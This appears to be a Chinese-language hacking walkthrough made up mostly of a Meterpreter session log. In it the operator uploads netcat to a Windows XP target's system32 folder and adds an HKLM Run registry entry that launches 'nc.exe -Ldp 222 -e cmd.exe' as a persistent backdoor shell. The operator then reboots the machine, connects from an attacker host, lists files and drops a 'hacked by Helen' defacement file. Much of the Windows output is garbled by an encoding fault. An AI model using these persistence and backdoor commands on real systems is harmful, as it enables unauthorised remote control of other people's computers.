meterpreter > upload /tmp/nc.exe C:\\windows\\system32\\

[*] uploading  : /tmp/nc.exe -> C:\windows\system32\

[*] uploaded   : /tmp/nc.exe -> C:\windows\system32\\nc.exe

 

写入目标机器注册表开机启动项，恩，应该是这样吧...

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v *** -d C:\\windows\\system32\\nc.exe" -Ldp 222 -e cmd.exe"

Successful set ***.

meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v ***

Key: HKLM\software\microsoft\windows\currentversion\Run

Name: ***

Type: REG_SZ

Data: C:\windows\system32\nc.exe -Ldp 222 -e cmd.exe

meterpreter > reboot

Rebooting...

meterpreter >

来看看，使用NC连接目标机器，DIR啊!!!有木有!!!

root@Dis9Team:/# cd /tmp/

root@Dis9Team:/tmp# nc 192.168.1.101 222

Microsoft Windows XP [锟芥本 5.1.2600]

(C) 锟斤拷权锟斤拷锟斤拷 1985-2001 Microsoft Corp.

  

C:\Documents and Settings\jj>dir

dir

 锟斤拷锟斤拷锟斤拷 C 锟叫的撅拷没锟叫憋拷签锟斤拷

 锟斤拷锟斤拷锟斤拷锟叫猴拷锟斤拷 B015-6347

  

 C:\Documents and Settings\jj 锟斤拷目录

  

2011-06-23  19:57    <DIR>          .

2011-06-23  19:57    <DIR>          ..

2011-06-23  19:58    <DIR>          Favorites

2011-06-23  19:58    <DIR>          My Documents

2011-06-23  19:36    <DIR>          锟斤拷锟斤拷始锟斤拷锟剿碉拷

2011-06-23  19:36    <DIR>          锟斤拷锟斤拷

               0 锟斤拷锟侥硷拷              0 锟斤拷

               6 锟斤拷目录  8,643,579,904 锟斤拷锟斤拷锟斤拷

惊现Helen大黑客~

  

C:\>echo "hacked by Helen" >***.txt

echo "hacked by Helen" >***.txt